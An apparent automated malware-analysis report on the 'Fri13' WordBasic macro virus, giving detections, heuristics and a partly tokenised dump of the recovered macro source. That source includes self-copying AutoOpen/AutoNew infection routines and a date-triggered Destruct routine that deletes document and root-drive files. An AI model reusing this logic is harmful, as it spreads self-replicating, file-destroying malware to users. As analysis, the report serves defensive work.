MALICIOUS
Risk Score: 102
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as a legacy WordBasic macro virus, specifically a "RSN MACRO VIRUS Goat file". This indicates the presence of malicious macros intended to execute arbitrary code. The ClamAV detection, Win.Trojan.Fries-1, further confirms its malicious nature. The document body contains numerous macro-related keywords and function names, reinforcing the macro execution attack vector.
Heuristics 3
- ClamAV: Win.Trojan.Fries-1 (severity: critical, rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Win.Trojan.Fries-1
- Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS). OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- Recovered legacy WordBasic macro source (severity: info, rule: OLE_LEGACY_WORDBASIC_MACRO_SOURCE). The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| wordbasic_macros.txt | wordbasic-macro | analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) | 3651 bytes |

SHA-256: 92b7aac73cd4a5322a225462ecd9d275e59a36c008ac5c056de2936418e93843
Preview script (first 1,000 lines of the extracted script):
= @cmd6e69 29551 = MAIN @cmd809e 1 t1 = @cmd80f7 t = t1 = @cmd8100 "0:00:03" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t @cmd80b3 Alarm$ , "Begin" Kor1$ Argument s$ = @cmd80ea @cmd8007 Argument Argument 10 s$ = "0" = s$ Kor1$ = s$ MAIN @cmd809e 1 True = 1 False = 0 Flag_v = False Flag_i = False count = 1 @cmd80b7 0 name$ = @cmd80b8 count , 0 name$ = = Flag_i = True name$ = "Fri13" Flag_v = True count Flag_i = True t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13x @cmd80f5 t = ":" = Fri13x @cmd80ff t @cmd80b3 Alarm$ , = Flag_v = False dlg2 @cmd004e dlg2 name$ = dlg2 = "\" = dlg2 @cmd6400 norm$ = dlg2 Move "AutoOpen" , "AutoOpenf" , name$ , norm$ Move "Begin" , "Beginf" , name$ , norm$ Move "AutoClosex" , "AutoClose" , name$ , norm$ Move "AutoOpenx" , "AutoOpen" , name$ , norm$ Move "AutoOpenx" , "AutoNew" , name$ , norm$ Move "Fri13x" , "Fri13" , name$ , norm$ t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13x @cmd80f5 t = ":" = Fri13x @cmd80ff t @cmd00d1 = 0 @cmd80b3 Alarm$ , "Fri13" Move inp$ , outp$ , name$ , norm$ @cmd00de , = name$ , = norm$ , = inp$ , = 3 @cmd00de , = norm$ , = inp$ , = outp$ , = 3 MAIN True = 1 False = 0 dlg2 @cmd004e Flag_i = False count = 1 @cmd80b7 0 name$ = @cmd80b8 count , 0 name$ = = Flag_i = True count Flag_i = True t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t @cmd80b3 Alarm$ , = @cmd8023 = True @cmd80b7 1 = 0 @cmd0054 = 1 dlg2 name$ = dlg2 = "\" = dlg2 @cmd6400 DelMacro "AutoOpen" , name$ DelMacro "Begin" , name$ DelMacro "AutoClosex" , name$ DelMacro "AutoOpenx" , name$ DelMacro "Fri13x" , name$ dlg2 name$ = dlg2 = "\" = dlg2 @cmd6400 norm$ = dlg2 MoveD "Beginf" , "Begin" , norm$ , name$ MoveD "AutoClose" , "AutoClosex" , norm$ , name$ MoveD "AutoOpen" , "AutoOpenx" , norm$ , name$ MoveD "AutoOpenf" , "AutoOpen" , norm$ , name$ MoveD "Fri13" , "Fri13x" , norm$ , name$ t = t1 = @cmd8100 "0:00:32" 
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t @cmd80b3 Alarm$ , "Fri13" MoveD inp$ , outp$ , nameinp$ , nameout$ @cmd00de , = nameinp$ , = nameout$ , = inp$ , = 3 @cmd00de , = nameout$ , = inp$ , = outp$ , = 3 DelMacro NameMscro$ , NameOut$ True = 1 False = 0 Flag_i = False count = 1 @cmd80b7 1 name$ = @cmd80b8 count , 1 name$ = NameMscro$ Flag_i = True count Flag_i = True @cmd00de , = NameOut$ , = NameMscro$ , = 3 MAIN True = 1 False = 0 Flag_i = False count = 1 @cmd80b7 0 name$ = @cmd80b8 count , 0 name$ = = Flag_i = True count Flag_i = True t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t @cmd80b3 Alarm$ , = t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t @cmd80b3 Alarm$ , "Fri13" MAIN @cmd809e 1 True = 1 False = 0 zader$ = "0:01:00" Flag_i = False count = 1 @cmd80b7 0 name$ = @cmd80b8 count , 0 name$ = = Flag_i = True count t1 = @cmd80f7 Flag_i = True t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t @cmd80b3 Alarm$ , = t = t1 = @cmd8100 zader$ Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t @cmd803a 0 Destruct @cmd80b3 Alarm$ , "Fri13" Kor1$ Argument s$ = @cmd80ea @cmd8007 Argument Argument 10 s$ = "0" = s$ Kor1$ = s$ Destruct @cmd80f8 @cmd80f7 = 6 @cmd80f2 @cmd80f7 = 13 @cmd809e 1 @cmd80ab "*.DOC" @cmd80ab "C:\*.*" @cmd802b = @cmd8005 10 = @cmd8005 13 = = @cmd8005 10 = @cmd8005 13 = , , 64 |